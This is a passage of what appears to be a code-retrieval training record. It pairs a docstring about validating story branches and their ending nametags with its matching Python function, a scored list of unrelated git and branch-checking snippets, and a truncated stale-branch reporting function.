return True\n except subprocess.CalledProcessError:\n return False", "def branch(name, wit_path):\n\n if name != 'None':\n\n if len(name) < 30:\n head = _get_head(wit_path)\n _add_branch(wit_path, name, head)\n else:\n logging.error(f'branch name is too long \"{name}\" (max 30 digits).')\n else:\n logging.error(f'branch name is not valid {name}.')", "def has_name(self, name: str) -> bool:\n return name in self.child_tags", "def is_branch(self, inst_type):\n return inst_type in CONDITIONAL_BRANCH_TYPES or \\\n inst_type in UNCONDITIONAL_BRANCH_TYPES", "def branch_exists(branch_name, local_only=False, directory=None):\n for branch in get_branches(local_only, directory):\n if branch.startswith('remotes/'):\n branch = branch.split('/')\n if len(branch) > 2:\n branch = '/'.join(branch[2:])\n if branch_name == branch:\n return True\n else:\n if branch_name == branch:\n return True\n return False", "def local_branch_exists(self, branch):\n return branch in self.repo.branches", "def test_branch_name_get(repository: Repository) -> None:\n branch = repository.branch(repository.head.name)\n assert repository.head.name == branch.name", "def isLeaf(self, node_name):\n if self.tree.node[node_name]['c'] != '':\n return True\n else:\n return False", "def _is_current_branch(self, branch_name, current_branch_name):\n return branch_name == current_branch_name", "def is_valid_label(self, label):\n try:\n self.validate_label(label)\n return True\n except etal.LabelsSchemaError:\n return False", "def branch_exists(repo, branch, remote=False):\n ref = 'refs/remotes/origin/' + branch if remote else 'refs/heads/' + branch\n return subprocess.call(['git', 'show-ref', '-q', '--verify', ref],\n cwd=repo) == 0", "def master_branch(branch_name):\n\n if branch_name in MASTER_BRANCHES:\n return True\n\n return False", "def check_for_branch_op(op_info: ModuleIdentifierOpInfo):\n\n op = conn_graph.get_all_ops()[op_info.module_name]\n return_bool = True\n product = op.output\n if \"branch\" not in product.name:\n logger.error(\"branch not in product name\")\n return_bool = False\n if len(product.consumers) > 1:\n logger.error(\"branch op is not parent op's only consumer\")\n return_bool = False\n branch_op = product.consumers[0]\n if branch_op.type != \"branch\":\n logger.error(\"parent op's child op is not of type branch\")\n return_bool = False\n branch_product = branch_op.output\n if \"multiple_ops\" not in branch_product.name:\n logger.error(\"multiple_ops not in branch op's product's name\")\n return_bool = False\n if len(branch_product.consumers) <= 1:\n logger.error(\"branch op's product has one or fewer consumers\")\n return_bool = False\n for consumer in branch_product.consumers:\n for input_product in consumer.inputs:\n if input_product.producer == op:\n logger.error(\"parent op is still one of child op's inputs (as opposed to branch op)\")\n return_bool = False\n return return_bool", "def has_label(self, label):\n return label == self.label", "def is_valid_git_refname(refname):\r\n if len(refname) == 0:\r\n return False\r\n\r\n # git imposes a few requirements to accept a string as a\r\n # refname/branch-name\r\n\r\n # They can include slash / for hierarchical (directory) grouping, but no\r\n # slash-separated component can begin with a dot . or end with the sequence\r\n # .lock\r\n if (len([True for element in refname.split('/')\r\n if element.startswith('.') or element.endswith('.lock')]) != 0):\r\n return False\r\n\r\n # They cannot have two consecutive dots .. anywhere\r\n if '..' in refname:\r\n return False\r\n\r\n # They cannot have ASCII control characters (i.e. bytes whose values are\r\n # lower than \\040, or \\177 DEL), space, tilde, caret ^, or colon : anywhere\r\n if len([True for refname_char in refname if ord(refname_char) < 40 or\r\n ord(refname_char) == 177]) != 0:\r\n return False\r\n if ' ' in refname or '~' in refname or '^' in refname or ':' in refname:\r\n return False\r\n\r\n # They cannot have question-mark ?, asterisk *, or open bracket [ anywhere\r\n if '?' in refname or '*' in refname or '[' in refname:\r\n return False\r\n\r\n # They cannot begin or end with a slash / or contain multiple consecutive\r\n # slashes\r\n if refname.startswith('/') or refname.endswith('/') or '//' in refname:\r\n return False\r\n\r\n # They cannot end with a dot ..\r\n if refname.endswith('.'):\r\n return False\r\n\r\n # They cannot contain a sequence @{\r\n if '@{' in refname:\r\n return False\r\n\r\n # They cannot contain a \\\r\n if '\\\\' in refname:\r\n return False\r\n\r\n return True", "def verify_tag(tag):\n command = [\"git\", \"tag\", \"--points-at\"]\n with subprocess.Popen(command, stdout=subprocess.PIPE) as proc:\n tag_str = proc.stdout.readline()\n return tag_str.decode(\"utf-8\").rstrip() == tag", "def has_label(self, label):\n return label in self.get_labels()", "def test_heads_create_new_branch_name(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\", repository.head.commit)\n assert \"branch\" == branch.name", "def is_valid_compound_name(name: str) -> bool:\n return n2s.has_smiles(name)", "def verify_branch(path, expected_branch=\"master\"):\n\n sys.stdout.write(\" - Verifying your branch is %s:\" % expected_branch)\n branch = run_in_component(path, ['git', 'rev-parse', '--abbrev-ref', 'HEAD'])\n branch = branch.strip()\n\n if branch == expected_branch:\n print(\" OKAY\")\n return\n\n print(\" FAILED\")\n\n raise GenericError(\"You must be on branch %s to release, you are on %s\" % (expected_branch, branch))", "def has_label(self, label):\n\t\treturn label in self.labels", "def has_label(self, label):\n\t\t\treturn label in self.labels" ]
[ "0.715576", "0.7042534", "0.6742809", "0.67223674", "0.6595517", "0.6064686", "0.6029496", "0.6010573", "0.59576434", "0.5933389", "0.58508664", "0.58427274", "0.584109", "0.582408", "0.58061534", "0.5799144", "0.5777416", "0.5758434", "0.5737931", "0.5732576", "0.5721581", "0.5707645", "0.5703956", "0.56670606", "0.5656595", "0.56549215", "0.56361145", "0.5628567", "0.5604564", "0.5591245" ]
0.7622634
0
Checks that the given branches are valid (every single branch is supposed valid). The idea here is to make sure that every ending nametag leads to another branch and that every branch is reachable.
def valid_branches(branches): # for every branch in the list for branch in branches: # make sure it is either reachable or has the special tag "start" if branches[branch].name != "start" and not is_nametag_reachable(branches[branch].name, branches): return False # make sure all ending tags refer to existing branches for nametag in branches[branch].next_nametags: if not branch_exists(nametag, branches): return False return True
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _check_branches(num_branches, num_blocks, in_channels, num_channels):\n if num_branches != len(num_blocks):\n error_msg = f'NUM_BRANCHES({num_branches}) != NUM_BLOCKS({len(num_blocks)})'\n raise ValueError(error_msg)\n if num_branches != len(num_channels):\n error_msg = f'NUM_BRANCHES({num_branches}) != NUM_CHANNELS({len(num_channels)})'\n raise ValueError(error_msg)\n if num_branches != len(in_channels):\n error_msg = f'NUM_BRANCHES({num_branches}) != NUM_INCHANNELS({len(in_channels)})'\n raise ValueError(error_msg)", "def _check_branches(self, num_branches, in_channels):\n if num_branches != len(in_channels):\n error_msg = f'NUM_BRANCHES({num_branches}) != NUM_INCHANNELS({len(in_channels)})'\n raise ValueError(error_msg)", "def validate(cfg: defs.Config) -> List[str]: # noqa: C901\n res: List[str] = []\n\n def check_branch(\n comp_name: str, branch_name: str, branch: Dict[str, defs.ComponentVersion]\n ) -> None:\n \"\"\"Validate versions within a single branch.\"\"\"\n uptodate_files: Dict[pathlib.Path, Tuple[pathlib.Path, defs.ComponentFile]] = {}\n\n if not RE_BRANCH_NAME.match(branch_name):\n res.append(f\"{comp_name}: Invalid branch name: {branch_name}\")\n\n for ver, version in sorted(branch.items()):\n if not RE_VERSION_STRING.match(ver):\n res.append(f\"{comp_name}/{branch_name}: Invalid version string: {ver}\")\n\n other_cksums, driver_cksums = _split_by_existence(comp_name, branch_name, version.files)\n if version.outdated:\n update_to = [\n o_version\n for o_version in branch.values()\n if not o_version.outdated\n and _split_by_existence(comp_name, branch_name, o_version.files)[0]\n == other_cksums\n ]\n if len(update_to) != 1:\n res.append(\n f\"{comp_name}/{branch_name}/{ver}: Got {len(update_to)} possible \"\n f\"versions to update to instead of exactly one\"\n )\n else:\n bad_files = sorted(\n relpath\n for relpath, (path, fdata) in driver_cksums.items()\n if util.file_sha256sum(path) != fdata.sha256\n )\n if bad_files:\n res.append(f\"{comp_name}/{branch_name}/{ver}: Bad checksum for {bad_files}\")\n\n if not uptodate_files:\n uptodate_files = driver_cksums\n elif uptodate_files != driver_cksums:\n res.append(\n f\"{comp_name}/{branch_name}: All the up-to-date versions should \"\n f\"define the same set of files with the same checksums\"\n )\n\n if not any(not version.outdated for version in branch.values()):\n res.append(f\"{comp_name}/{branch_name}: No non-outdated versions\")\n\n def check_component(comp_name: str, comp: defs.Component) -> None:\n \"\"\"Validate the definition of a single component.\"\"\"\n if not RE_COMP_NAME.match(comp_name):\n res.append(f\"Invalid component name: {comp_name}\")\n\n for branch_name, branch in sorted(comp.branches.items()):\n check_branch(comp_name, branch_name, branch)\n\n for comp_name, comp in sorted(cfg.all_components.components.items()):\n check_component(comp_name, comp)\n\n return res", "def check_branch(\n comp_name: str, branch_name: str, branch: Dict[str, defs.ComponentVersion]\n ) -> None:\n uptodate_files: Dict[pathlib.Path, Tuple[pathlib.Path, defs.ComponentFile]] = {}\n\n if not RE_BRANCH_NAME.match(branch_name):\n res.append(f\"{comp_name}: Invalid branch name: {branch_name}\")\n\n for ver, version in sorted(branch.items()):\n if not RE_VERSION_STRING.match(ver):\n res.append(f\"{comp_name}/{branch_name}: Invalid version string: {ver}\")\n\n other_cksums, driver_cksums = _split_by_existence(comp_name, branch_name, version.files)\n if version.outdated:\n update_to = [\n o_version\n for o_version in branch.values()\n if not o_version.outdated\n and _split_by_existence(comp_name, branch_name, o_version.files)[0]\n == other_cksums\n ]\n if len(update_to) != 1:\n res.append(\n f\"{comp_name}/{branch_name}/{ver}: Got {len(update_to)} possible \"\n f\"versions to update to instead of exactly one\"\n )\n else:\n bad_files = sorted(\n relpath\n for relpath, (path, fdata) in driver_cksums.items()\n if util.file_sha256sum(path) != fdata.sha256\n )\n if bad_files:\n res.append(f\"{comp_name}/{branch_name}/{ver}: Bad checksum for {bad_files}\")\n\n if not uptodate_files:\n uptodate_files = driver_cksums\n elif uptodate_files != driver_cksums:\n res.append(\n f\"{comp_name}/{branch_name}: All the up-to-date versions should \"\n f\"define the same set of files with the same checksums\"\n )\n\n if not any(not version.outdated for version in branch.values()):\n res.append(f\"{comp_name}/{branch_name}: No non-outdated versions\")", "def branch_exists(nametag, branches):\n for branch in branches:\n if branches[branch].name == nametag:\n return True\n return False", "def validate_branch_config(branch_cfg, branch, n):\n res = False\n if len(branch) == 4:\n if \"double\" in branch_cfg:\n diff1 = branch[0]-branch[1]\n diff3 = branch[2]-branch[3]\n diff2 = branch[1]%n-branch[2]%n\n diff_adj_clk = [-3, 1]\n diff_adj_clk_ctr = [-e for e in diff_adj_clk]\n diff_opp = [2, -2]\n if \"adjacent\" and \"clockwise\" in branch_cfg and diff1 == diff3 == 0 and diff2 in diff_adj_clk:\n res = True\n elif \"adjacent\" and \"counter clockwise\" in branch_cfg and diff1 == diff3 == 0 and diff2 in diff_adj_clk_ctr:\n res = True\n elif \"opposite\" in branch_cfg and diff1 == diff3 == 0 and diff2 in diff_opp:\n res = True\n elif \"single\" in branch_cfg:\n res = True\n elif len(branch) == 2:\n res = True\n return res", "def validate_branch_ops(conn_graph: ConnectedGraph):\n\n def check_for_branch_op(op_info: ModuleIdentifierOpInfo):\n \"\"\"\n Look inside conn_graph ops and products for branch ops, and validate connections to parent and child ops\n \"\"\"\n\n op = conn_graph.get_all_ops()[op_info.module_name]\n return_bool = True\n product = op.output\n if \"branch\" not in product.name:\n logger.error(\"branch not in product name\")\n return_bool = False\n if len(product.consumers) > 1:\n logger.error(\"branch op is not parent op's only consumer\")\n return_bool = False\n branch_op = product.consumers[0]\n if branch_op.type != \"branch\":\n logger.error(\"parent op's child op is not of type branch\")\n return_bool = False\n branch_product = branch_op.output\n if \"multiple_ops\" not in branch_product.name:\n logger.error(\"multiple_ops not in branch op's product's name\")\n return_bool = False\n if len(branch_product.consumers) <= 1:\n logger.error(\"branch op's product has one or fewer consumers\")\n return_bool = False\n for consumer in branch_product.consumers:\n for input_product in consumer.inputs:\n if input_product.producer == op:\n logger.error(\"parent op is still one of child op's inputs (as opposed to branch op)\")\n return_bool = False\n return return_bool\n\n # pylint: disable=protected-access\n module_identifier = StructureModuleIdentifier(conn_graph.graph, conn_graph._starting_op_names,\n conn_graph._valid_ops)\n num_branches_found = 0\n for tf_op in conn_graph.graph.get_operations():\n # Ignore ops which were not found in the initial depth first search\n if tf_op not in module_identifier.processed_ops:\n continue\n\n found_branch = False\n for output_tensor in tf_op.outputs:\n if len(output_tensor.consumers()) > 1:\n # Potential branch op. Check if children go to separate modules\n child_module_set = set()\n for consumer_op in output_tensor.consumers():\n if consumer_op in module_identifier._valid_ops:\n child_module_info = module_identifier.get_op_info(consumer_op)\n child_module_set.add(child_module_info.module_name)\n\n # If children go to separate modules, this should be a branch op\n if len(child_module_set) > 1:\n found_branch = True\n break\n\n if found_branch:\n num_branches_found += 1\n tf_op_info = module_identifier.get_op_info(tf_op)\n if not check_for_branch_op(tf_op_info):\n return False\n\n logger.info(\"Found %s branches\", num_branches_found)\n return True", "def is_nametag_reachable(nametag, branches):\n for branch in branches:\n for next_nametag in branches[branch].next_nametags:\n if next_nametag == nametag:\n return True\n return False", "def ensure_tracking_branches(args):\n man = load_manifest()\n for (name, project) in man.projects.iteritems():\n repo = GitRepo(workdir_for_project(project))\n branch_missing = repo.command(\n [\"rev-parse\", \"--verify\", \"-q\", project.refspec],\n capture_stdout=True)\n \n if branch_missing:\n logging.warn(\"Branch %s does not exist in project %s. checking out.\" %\n (project.refspec, name))\n repo.command([\"branch\", \"--track\",\n project.tracking_branch, project.remote_refspec])", "def validate_empty_branches(nanowire, min_free_branch, msg):\n score = 0\n valid = False\n\n for intersection in nanowire:\n free_b = 0\n for branch in intersection:\n min_free_pos = len(branch)\n free_p = 0\n for tup in branch:\n if not isinstance(tup, dict):\n continue\n if list(tup.values())[0] == 0:\n free_p += 1\n else:\n free_p = 0\n if free_p>=min_free_pos:\n free_b += 1\n if free_b>=min_free_branch:\n valid = True\n\n if valid:\n score += 1\n # if score==0:\n # raise exception.NoEmptyBranchException(msg)\n return score", "def _validate_branch_args(self) -> None:\n lk = set(self.branch_losses.keys())\n dk = set(self.model._get_inner_keys(self.model.heads))\n has_same_keys = lk == dk\n\n mk = None\n if self.branch_metrics is not None:\n mk = set(self.branch_metrics.keys())\n has_same_keys = dk == lk == mk\n\n ek = None\n if self.branch_loss_params is not None:\n ek = set(self.branch_loss_params.keys())\n has_same_keys = dk == lk == mk == ek\n\n if not has_same_keys:\n raise ValueError(\n \"Got mismatching keys for branch dict args. \"\n f\"Branch losses: {lk}. \"\n f\"Branch loss params: {ek}. \"\n f\"Decoder branches: {dk}. \"\n f\"Metrics: {mk}. \"\n f\"(`metrics`, and `branch_loss_params` can be None)\"\n )", "def test_is_valid_git_refname(self):\n # valid branchnames\n self.assertTrue(is_valid_git_refname('master'))\n self.assertTrue(is_valid_git_refname('debuggatron_2000'))\n self.assertTrue(is_valid_git_refname('refname/bar'))\n self.assertTrue(is_valid_git_refname('ref.nameslu/_eggs_/spam'))\n self.assertTrue(is_valid_git_refname('valid{0}char'.format(\n unichr(40))))\n self.assertTrue(is_valid_git_refname('master@head'))\n self.assertTrue(is_valid_git_refname('bar{thing}foo'))\n\n # case happening with git < 1.6.6\n self.assertFalse(is_valid_git_refname(\n '--abbrev-ref\\nbaa350d7b7063d585ca293fc16ef15e0765dc9ee'))\n\n # different invalid refnames, for a description of each group see the\n # man page of git check-ref-format\n self.assertFalse(is_valid_git_refname('bar/.spam/eggs'))\n self.assertFalse(is_valid_git_refname('bar.lock/spam/eggs'))\n self.assertFalse(is_valid_git_refname('bar.lock'))\n self.assertFalse(is_valid_git_refname('.foobar'))\n\n self.assertFalse(is_valid_git_refname('ref..name'))\n\n self.assertFalse(is_valid_git_refname(u'invalid{0}char'.format(\n unichr(177))))\n self.assertFalse(is_valid_git_refname('invalid{0}char'.format(\n unichr(39))))\n self.assertFalse(is_valid_git_refname('ref~name/bar'))\n self.assertFalse(is_valid_git_refname('refname spam'))\n self.assertFalse(is_valid_git_refname('bar/foo/eggs~spam'))\n self.assertFalse(is_valid_git_refname('bar:_spam_'))\n self.assertFalse(is_valid_git_refname('eggtastic^2'))\n\n self.assertFalse(is_valid_git_refname('areyourandy?'))\n self.assertFalse(is_valid_git_refname('bar/*/spam'))\n self.assertFalse(is_valid_git_refname('bar[spam]/eggs'))\n\n self.assertFalse(is_valid_git_refname('/barfooeggs'))\n self.assertFalse(is_valid_git_refname('barfooeggs/'))\n self.assertFalse(is_valid_git_refname('bar/foo//////eggs'))\n\n self.assertFalse(is_valid_git_refname('dotEnding.'))\n\n self.assertFalse(is_valid_git_refname('@{branch'))\n\n self.assertFalse(is_valid_git_refname('contains\\\\slash'))\n\n self.assertFalse(is_valid_git_refname('$newbranch'))", "def _check_branch(opt, params):\n\n # Check the current branch and hash\n _get_branch(opt)\n\n if params.git_branch != opt.git_branch or params.git_hash != opt.git_hash:\n msg = 'You are not on the right branch or commit. Please run the following in the repository: \\n'\n msg += f'git checkout {params.git_branch}\\n'\n msg += f'git revert {params.git_hash}'\n sys.exit(msg)", "def test_is_valid_git_refname(self):\r\n # valid branchnames\r\n self.assertTrue(is_valid_git_refname('master'))\r\n self.assertTrue(is_valid_git_refname('debuggatron_2000'))\r\n self.assertTrue(is_valid_git_refname('refname/bar'))\r\n self.assertTrue(is_valid_git_refname('ref.nameslu/_eggs_/spam'))\r\n self.assertTrue(is_valid_git_refname('valid{0}char'.format(\r\n unichr(40))))\r\n self.assertTrue(is_valid_git_refname('master@head'))\r\n self.assertTrue(is_valid_git_refname('bar{thing}foo'))\r\n\r\n # case happening with git < 1.6.6\r\n self.assertFalse(is_valid_git_refname(\r\n '--abbrev-ref\\nbaa350d7b7063d585ca293fc16ef15e0765dc9ee'))\r\n\r\n # different invalid refnames, for a description of each group see the\r\n # man page of git check-ref-format\r\n self.assertFalse(is_valid_git_refname('bar/.spam/eggs'))\r\n self.assertFalse(is_valid_git_refname('bar.lock/spam/eggs'))\r\n self.assertFalse(is_valid_git_refname('bar.lock'))\r\n self.assertFalse(is_valid_git_refname('.foobar'))\r\n\r\n self.assertFalse(is_valid_git_refname('ref..name'))\r\n\r\n self.assertFalse(is_valid_git_refname(u'invalid{0}char'.format(\r\n unichr(177))))\r\n self.assertFalse(is_valid_git_refname('invalid{0}char'.format(\r\n unichr(39))))\r\n self.assertFalse(is_valid_git_refname('ref~name/bar'))\r\n self.assertFalse(is_valid_git_refname('refname spam'))\r\n self.assertFalse(is_valid_git_refname('bar/foo/eggs~spam'))\r\n self.assertFalse(is_valid_git_refname('bar:_spam_'))\r\n self.assertFalse(is_valid_git_refname('eggtastic^2'))\r\n\r\n self.assertFalse(is_valid_git_refname('areyourandy?'))\r\n self.assertFalse(is_valid_git_refname('bar/*/spam'))\r\n self.assertFalse(is_valid_git_refname('bar[spam]/eggs'))\r\n\r\n self.assertFalse(is_valid_git_refname('/barfooeggs'))\r\n self.assertFalse(is_valid_git_refname('barfooeggs/'))\r\n self.assertFalse(is_valid_git_refname('bar/foo//////eggs'))\r\n\r\n self.assertFalse(is_valid_git_refname('dotEnding.'))\r\n\r\n self.assertFalse(is_valid_git_refname('@{branch'))\r\n\r\n self.assertFalse(is_valid_git_refname('contains\\\\slash'))\r\n\r\n self.assertFalse(is_valid_git_refname('$newbranch'))", "def protect_pr_branch_with_tests_if_any_exist(org: Organization, repo: Repository,\n branches: Dict[str, Branch]) -> List[Change[str]]:\n def execute_test_protection(change: Change[str], branch: Branch, existing_checks: Set[str],\n known_status_checks: Set[str], known_checkruns: Set[str]) -> Change[str]:\n\n all_known_checks = known_status_checks | known_checkruns # For convenience later to treat them as a single set\n\n print_debug(\"[%s] Changing status checks on branch '%s' to [%s]\" %\n (highlight(repo.name), highlight(branch.name),\n highlight(\", \".join(list(all_known_checks)))))\n try:\n if existing_checks:\n branch.edit_required_status_checks(strict=True, contexts=list(all_known_checks))\n else:\n safe_branch_edit_protection(\n branch,\n strict=True,\n contexts=list(all_known_checks),\n )\n except GithubException as e:\n print_error(\"Can't edit required status checks on repo %s branch %s: %s\" %\n (repo.name, branch.name, str(e)))\n return change.failure()\n return change.success()\n\n prb = get_pr_branch(repo, branches)\n if not prb:\n return []\n\n existing_checks = set() # type: Set[str]\n try:\n rqs = prb.get_required_status_checks()\n except GithubException:\n # the repository has currently no status checks\n pass\n else:\n if len(rqs.contexts) > 0:\n # The repository already has some status checks\n existing_checks = set(rqs.contexts)\n print_debug(\"Branch %s on repo %s already has status checks [%s]\" %\n (highlight(prb.name), highlight(repo.name), highlight(\", \".join(existing_checks))))\n\n # the repository currently has no status checks, let's see if any came in within the last 7 days\n sevendaysago = datetime.now() - timedelta(days=7)\n commits = repo.get_commits(prb.name, since=sevendaysago)\n known_status_checks = set() # type: Set[str]\n known_checkruns = set() # type: Set[str]\n for commit in commits:\n for status in commit.get_statuses(): # type: CommitStatus\n if status.context not in known_status_checks:\n print_debug(\"New status check [%s]: %s %s '%s'\" %\n (commit.sha, status.updated_at,\n status.context, status.description))\n known_status_checks.add(status.context)\n for checkrun in commit.get_check_runs(): # type: CheckRun\n if checkrun.name not in known_checkruns:\n print_debug(\"New check run [%s]: %s %s %s\" %\n (commit.sha, checkrun.completed_at, checkrun.name, checkrun.app))\n known_checkruns.add(checkrun.name)\n\n all_known_checks = known_status_checks | known_checkruns # For convenience later to treat them as a single set\n print_debug(\"Found status checks [%s]\" % \", \".join(all_known_checks))\n\n if all_known_checks and all_known_checks != existing_checks:\n # add all known checks as required checks\n print_debug('Adding checks [%s] to branch %s on repo %s' %\n (highlight(\", \".join((all_known_checks) - existing_checks)),\n highlight(prb.name), highlight(repo.name)))\n return [Change(\n meta=ChangeMetadata(\n executor=execute_test_protection,\n params=[prb, existing_checks, known_status_checks, known_checkruns]\n ),\n action=ChangeActions.REPLACE if existing_checks else ChangeActions.ADD,\n before=\"%s checks\" % len(existing_checks) if existing_checks else \"No checks\",\n after=\"%s checks\" % len(all_known_checks),\n )]\n return []", "def check_component(comp_name: str, comp: defs.Component) -> None:\n if not RE_COMP_NAME.match(comp_name):\n res.append(f\"Invalid component name: {comp_name}\")\n\n for branch_name, branch in sorted(comp.branches.items()):\n check_branch(comp_name, branch_name, branch)", "def test_multi_branches(self):\n sgf = \"\"\"\n (;FF[4]GM[1]SZ[19];B[aa];W[bb](;B[cc];W[dd](;B[ad];W[bd])\n (;B[ee];W[ff]))\n (;B[hh];W[gg])\n (;B[ii];W[jj]))\n \"\"\"\n coll = parseSgf(sgf)\n self.assertEqual(coll,\n [[{'SZ': '19', 'GM': '1', 'FF': '4'}, {'B': 'aa'},\n {'W': 'bb'},\n [[{'B': 'cc'}, {'W': 'dd'}, [[{'B': 'ad'}, {'W': 'bd'}], [{'B': 'ee'}, {'W': 'ff'}]]],\n [{'B': 'hh'}, {'W': 'gg'}],\n [{'B': 'ii'}, {'W': 'jj'}]],\n ]])\n self.assertEqual(self._trim_sgf_whitespace(sgf), makeSgf(coll))", "def formatted_branch_name(branch):\n for exp in experiments:\n if exp in branch:\n for otype in observation_types:\n if otype in branch:\n for stype in shear_types:\n if stype in branch:\n return exp+'-'+otype+'-'+stype\n raise RuntimeError('Branch %s does not appear to be a valid branch name--please pass one of '\n '[%s] with the command-line option -b.'%(branch, ', '.join(branch_names)))", "def verify_branch(path, expected_branch=\"master\"):\n\n sys.stdout.write(\" - Verifying your branch is %s:\" % expected_branch)\n branch = run_in_component(path, ['git', 'rev-parse', '--abbrev-ref', 'HEAD'])\n branch = branch.strip()\n\n if branch == expected_branch:\n print(\" OKAY\")\n return\n\n print(\" FAILED\")\n\n raise GenericError(\"You must be on branch %s to release, you are on %s\" % (expected_branch, branch))", "def check_children_attributes(self, branch):\n attributes = branch.get_attributes()\n for attr in attributes:\n if not isinstance(attributes[attr], str) and not isinstance(attributes[attr], list) :\n print('Attribute '+str(attr)+' of '+ branch.__class__.__name__ + ' should be str or list')\n self.assertTrue(False)\n children = branch.get_children()\n for child in children:\n self.check_children_attributes(child)", "def verify_tags(git_ref_target):\n latest_release = github_util.get_latest_release().get('name')\n latest_commit = run('git rev-list -n 1 {}'.format(latest_release)).stdout.rstrip(\"\\r\\n\")\n if not branch_check(latest_release, git_ref_target):\n print('Your branch does not contain the latest production code. \\n\\\n Please recreate it by branching off of release {}.'.format(latest_release))\n exit(1)\n else:\n print(\"Branch contains the latest production tag\")\n fork_point = run('git merge-base remotes/origin/master remotes/origin/{}'.format(git_ref_target))\n commits_since_fork = run('git rev-list --branches={} {}^..HEAD'.format(git_ref_target,\n fork_point.stdout.rstrip(\"\\r\\n\")))\n if latest_commit not in commits_since_fork.stdout:\n print('Your branch did not fork directly from the last production tag. \\n\\\n Please recreate it by branching off of release {}.'.format(latest_release))\n exit(1)\n else:\n print('Latest production tag is between the fork point and HEAD')", "def branch(name, wit_path):\n\n if name != 'None':\n\n if len(name) < 30:\n head = _get_head(wit_path)\n _add_branch(wit_path, name, head)\n else:\n logging.error(f'branch name is too long \"{name}\" (max 30 digits).')\n else:\n logging.error(f'branch name is not valid {name}.')", "def verify_submissions_valid() -> bool:\n\n submitters = [file for file in os.listdir(SUBS_DIR) if not file.startswith(\".\")]\n submissions_valid = True\n\n for submitter in submitters:\n expected_submission_path = f\"{SUBS_DIR}/{submitter}/{ASSIGNMENT}\"\n if not os.path.exists(expected_submission_path):\n print(f\"{Ansi.RED}ERROR:{Ansi.END} {expected_submission_path} does not exist\")\n submissions_valid = False\n continue\n else:\n git = subprocess.run(\"git remote -v\", shell=True, cwd=expected_submission_path, stdout=subprocess.PIPE,\n universal_newlines=True, check=False)\n if ASSIGNMENT not in git.stdout:\n print(f\"{Ansi.RED}ERROR:{Ansi.END} {expected_submission_path} does not contain a git history\")\n submissions_valid = False\n\n return submissions_valid", "def is_valid_git_refname(refname):\r\n if len(refname) == 0:\r\n return False\r\n\r\n # git imposes a few requirements to accept a string as a\r\n # refname/branch-name\r\n\r\n # They can include slash / for hierarchical (directory) grouping, but no\r\n # slash-separated component can begin with a dot . or end with the sequence\r\n # .lock\r\n if (len([True for element in refname.split('/')\r\n if element.startswith('.') or element.endswith('.lock')]) != 0):\r\n return False\r\n\r\n # They cannot have two consecutive dots .. anywhere\r\n if '..' in refname:\r\n return False\r\n\r\n # They cannot have ASCII control characters (i.e. bytes whose values are\r\n # lower than \\040, or \\177 DEL), space, tilde, caret ^, or colon : anywhere\r\n if len([True for refname_char in refname if ord(refname_char) < 40 or\r\n ord(refname_char) == 177]) != 0:\r\n return False\r\n if ' ' in refname or '~' in refname or '^' in refname or ':' in refname:\r\n return False\r\n\r\n # They cannot have question-mark ?, asterisk *, or open bracket [ anywhere\r\n if '?' in refname or '*' in refname or '[' in refname:\r\n return False\r\n\r\n # They cannot begin or end with a slash / or contain multiple consecutive\r\n # slashes\r\n if refname.startswith('/') or refname.endswith('/') or '//' in refname:\r\n return False\r\n\r\n # They cannot end with a dot ..\r\n if refname.endswith('.'):\r\n return False\r\n\r\n # They cannot contain a sequence @{\r\n if '@{' in refname:\r\n return False\r\n\r\n # They cannot contain a \\\r\n if '\\\\' in refname:\r\n return False\r\n\r\n return True", "def check_stale_branches(event: dict, context) -> dict:\n\n ssm_parameters = load_params('dev_tools', 'dev')\n\n if 'jira_statuses_for_task_completion' in ssm_parameters and ssm_parameters['jira_statuses_for_task_completion']:\n jira_statuses_for_task_completion = ssm_parameters['jira_statuses_for_task_completion']\n else:\n jira_statuses_for_task_completion = ('Resolved', 'Closed')\n\n repository_names = ssm_parameters['github_repository_names']\n github_repository_names = repository_names.split(',')\n\n jira_oauth_dict = {\n 'access_token': ssm_parameters['jira_access_token'],\n 'access_token_secret': ssm_parameters['jira_access_token_secret'],\n 'consumer_key': ssm_parameters['jira_consumer_key'],\n 'key_cert': ssm_parameters['jira_private_key']\n }\n auth_jira = JIRA(ssm_parameters['jira_url'], oauth=jira_oauth_dict)\n\n # Github authentication setup\n g = Github(ssm_parameters['github_access_token'])\n\n # Look for stale branches for all the specified repos\n total_stale_branches = 0\n general_report = ''\n author_count = defaultdict(int)\n\n for repo_name in github_repository_names:\n logger.debug(f'\\nChecking repo: {repo_name}')\n\n try:\n repo = g.get_repo(f\"{ssm_parameters['github_account']}/{repo_name}\")\n except GithubException:\n logger.error(f\"Github repository '{ssm_parameters['github_account']}/{repo_name}' not found!\")\n continue\n\n repo_report = ''\n\n # confirm the name for the main develop branch\n main_develop_branch = 'develop'\n try:\n _ = repo.get_branch('develop')\n except GithubException:\n main_develop_branch = 'master'\n logger.debug('Develop branch not found, using master as the main develop branch.')\n continue\n\n branches = repo.get_branches()\n for branch in branches:\n # only check feature and hotfix branches\n if not branch.name.startswith('feature/') and not branch.name.startswith('hotfix/'):\n continue\n\n # compare the branch against the main develop branch\n try:\n comparison = repo.compare(main_develop_branch, branch.name)\n except GithubException as error:\n logger.error(f'GithubException: Error while trying to compare {main_develop_branch} and {branch.name}.')\n logger.error(f'GithubException: {error}.')\n\n if comparison.behind_by == 0:\n # the branch is up to date, nothing to do\n continue\n\n # try to get the jira ticket number from the branch name\n ticket = None\n result = re.search(r'feature/(?P<ticket>[a-zA-Z]+-[0-9]+).*', branch.name)\n if result:\n ticket = result.groupdict()['ticket'].upper()\n try:\n issue = auth_jira.issue(ticket)\n except jira_exceptions.JIRAError:\n logger.debug(f\"The ticket {ticket} specified in the branch name doesn't exist in Jira.\")\n\n if issue and issue.fields.status.name not in jira_statuses_for_task_completion:\n # the issue hasn't been marked as resolved in jira, so the branch may still be needed\n continue\n\n author = branch.commit.author.login if branch.commit.author else 'unknown'\n author_count[author] += 1\n repo_report += f'Branch: {branch.name}\\nComparison status: {comparison.status}\\nAuthor: {author}\\n'\n if ticket:\n repo_report += f'Ticket status: \"{issue.fields.status.name}\\n'\n repo_report += '\\n'\n\n total_stale_branches += 1\n\n if repo_report:\n general_report += f'Repo: {repo_name}, develop branch name: {main_develop_branch}\\n{repo_report}'\n\n if total_stale_branches:\n count_by_author = ''\n for author, count in sorted(author_count.items(), key=operator.itemgetter(1), reverse=True):\n count_by_author += f'{author}: {count}\\n'\n\n report_overview = f'Current number of 